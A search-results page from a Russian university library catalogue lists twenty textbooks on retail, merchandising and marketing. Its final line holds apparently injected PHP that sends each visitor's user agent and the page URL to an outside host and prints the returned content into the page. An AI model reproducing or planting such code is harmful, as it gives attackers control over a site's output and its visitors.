Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

119 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=АССОРТИМЕНТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 364
1. 
Пястолов, Сергей Михайлович. Экономический анализ деятельности предприятий [Текст] : Учеб. пособие для экон. специальностей вузов / С. М. Пястолов, 2003. - 571, [1] с.

Наряду с общими теоретическими положениями в каждой главе представлены вопросы для повторения, иллюстрированный и справочный материал, примеры и задачи с решениями.

2. 
Миротин, Леонид Борисови. Логистика для предпринимателя: основные понятия, положения и процедуры [Текст] : Учеб. пособие / Л. Б. Миротин, Ы. Э. Ташбаев, 2003. - 250, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрен широкий круг вопросов - от основных положений и понятий до практических процедур логистики.

3. 
Топлива, смазочные материалы, технические жидкости. Ассортимент и применение [Текст] : Справ. / И. Г. Анисимов, К. М. Бадыштова, С. А. Бнатов и др; Под ред. В. М. Школьникова, 1999. - 596 с.
Держатели документа (Информация об экземплярах) 
4. 
Николаева, Мария Андреевна. Товароведение потребительских товаров. Теоретические основы [Текст] : Учеб. для вузов по специальности и направлению "Коммерция" и специальности "Товароведение и экспертиза товаров" / М. А.Николаева, 2002. - 278 с.
Держатели документа (Информация об экземплярах) 
5. 
Памбухчиянц, Ольга Валерьевна. Организация и технология коммерческой деятельности [Текст] : Учеб. для сред. спец. учеб. заведений / В. К. Памбухчиянц, 1999. - 288, [1] с.
Ключевые слова 

В учебнике освещаются основные этапы коммерческой деятельности в торговле, а также вопросы организации и технологии торговых процессов на предприятиях <оптовой> и <розничной> торговли. Материал приводится в последовательности, соответствующей реальному движению <товаров> из сферы материального производства в сферу <потребления>.

С учетом современного опыта освещаются актуальные вопросы организации <тарного> хозяйства в торговле и <перевозки> товаров различными видами транспорта.

6. 
Пястолов, Сергей Михайлович. Экономический анализ деятельности предприятий [Текст] : Учеб. пособие для экон. специальностей вузов / С. М. Пястолов, 2004. - 571, [1] с.
Держатели документа (Информация об экземплярах) 

Наряду с общими теоретическими положениями в каждой главе представлены вопросы для повторения, иллюстративный и справочный материал, примеры и задачи с решениями.

7. 
Организация производственного процесса на предприятии розничной торговли [Текст] : Метод. указания для выполнения курсовой работы / ОмГТУ, 2004. - 44 с.
Держатели документа (Информация об экземплярах) 
Полный текст
8. 
Шишкина, Ирина Вадимовна. Товароведение и экспертиза галантерейных товаров [Текст] : Учеб. пособие для вузов по специальности 351100 "Товароведение и экспертиза товаров" / И. В. Шишкина, 2003. - 188, [1] с.

Рассмотрены факторы, формирующие <ассортимент> и <качество> галантерейных товаров, дана классификация основных групп галантерейных изделий, отражены положения экспертизы галантерейных товаров различного назначения. Охарактеризованы условия хранения.

9. 
Памбухчиянц, Ольга Валерьевна. Технология розничной торговли [Текст] : Учеб. для нач. проф. образования по профессии "Продавец, контроллер-кассир" / О. В. Памбухчиянц, 2002. - 282, [1] с.

Рассматриваются основные операции, осуществляемые при розничной продаже <товаров> и организации <товародвижения>.

10. 
Данько Т. П. Управление маркетингом [Текст] : Учеб. для экон. специальностей вузов / Т. П.Данько, 2001. - 334 с.
11. 
Жиряева, Елена Васильевна. Товароведение [Текст] / Е. В. Жиряева, 2002. - 415 с.
12. 
Торговое дело: экономика, маркетинг, организация [Текст] : Учеб. по специальности "Экономика и управление предприятиями торговли" / Л. А. Брагин, Т. П. Данько, Г. Г. Иванов, 20002000. - 559 с.
13. 
Памбухчиянц, Ольга Валерьевна. Технология розничной торговли [Текст] : Учеб. для нач. проф. образования по профессии "Продавец, контролер-кассир" / О. В. Памбухчиянц, 2000. - 182 с.
Держатели документа (Информация об экземплярах) 
14. 
Леви, Майкл. Основы розничной торговли [Текст] / М. Леви, А. Вейтц; С. Жильцов, Ю. Н. Коптуревский, 1999. - 446 с.
Ключевые слова 
Торговля -- Розничная торговля -- Покупатель -- Конкурент -- Бизнес -- Менеджмент -- Фирма -- Торговля-микс -- Собственность -- Франчайзер -- Покупка -- Рынок -- Товар -- Принятие решения -- стратегическое планирование -- Магазин -- Управление товаром -- Планирование -- Ассортимент -- Закупка -- Поставщик -- Переговоры -- Ценообразование -- Цена -- Бюджет -- Коммуникация -- Сбыт -- Связь с общественностью -- Стимулирование -- Менеджер -- Обучение -- Заработная плата -- Вознаграждение -- Дизайн -- Обслуживание -- Продажа -- Модный товар -- Услуга -- Компания
15. 
Зубкова, Ирина Николаевна. Организация торговли непродовольственными товарами [Текст] : учеб. пособие / И. Н. Зубкова ; дар. В. А. Глотов, 2000. - 217 с.
16. 
Каменев, Ефим Израилевич. Применение пластических масс [Текст] : Справ. / Е. И. Каменев, Г. Д. Мясников, М. П. Платонов, 1985. - 448 с.
Держатели документа (Информация об экземплярах) 
17. 
Федько, Валерий Павлович. Основы маркетинга [Текст] : 100 экзаменац. ответов / В. П. Федько, Н. Г. Федько, 2000. - 444 с.
Ключевые слова 
Маркетинг -- Маркетинговое исследование -- Рынок -- Сегментация рынка -- Позиционирование -- Рыночная ниша -- конъюнктура рынка -- Товар -- Фирма -- Компенсация -- Полезность -- Товарная политика -- Ассортимент -- Покупатель -- Спрос -- Упаковка -- Маркировка -- Товарный знак -- Штриховой код -- Стратегия -- Конкуренция -- Франчайзинг -- Сбыт -- Биржа -- Аукцион -- Бизнес-план -- Коммуникация -- Репутация -- Паблик рилейшнз -- Ценообразование -- Реклама -- Имидж -- Цена -- Контроллинг -- Бюджет -- Этикет -- Сделка внешнеторговая -- КОММУНИКАЦИЯ МАРКЕТИНГОВАЯ -- паблик рилейшнз -- РЕКЛАМА - МАРКЕТИНГ -- МАРКЕТИНГ МЕЖДУНАРОДНЫЙ -- Имидж фирмы -- СТИЛЬ ФИРМЕННЫЙ -- ПОЛИТИКА ЦЕНОВАЯ -- ЦЕНООБРАЗОВАНИЕ - маркетинг -- СЛУЖБА МАРКЕТИНГА -- КОНТРОЛЛИНГ -- БЮДЖЕТ МАРКЕТИНГА
18. 
Шепелев А. Ф. Товарная номенклатура внешнеэкономической деятельности [Текст] / А. Ф. Шепелев, А. С. Туров, 2000. - 142 с.
19. 
Топлива, смазочные материалы, технические жидкости [Текст] : Ассортимент и применение: Справ. / К. М. Бадыштова, Я. А. Берштадт, Ш. К. Богданов; В. М. Школьников, 1989. - 432 с.
Держатели документа (Информация об экземплярах) 
20. 
Коммерческое товароведение и экспертиза [Текст] : Учеб. пособие для экон. специальностей вузов / Г. А. Васильев, Л. А. Ибрагимов, Н. А. Нагапетьянц и др.; Под ред. Г. А. Васильева, Н. А. Нагапетьянца, 1997. - 133, [2] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3101 - 06.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.12 запросов, 0.53c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;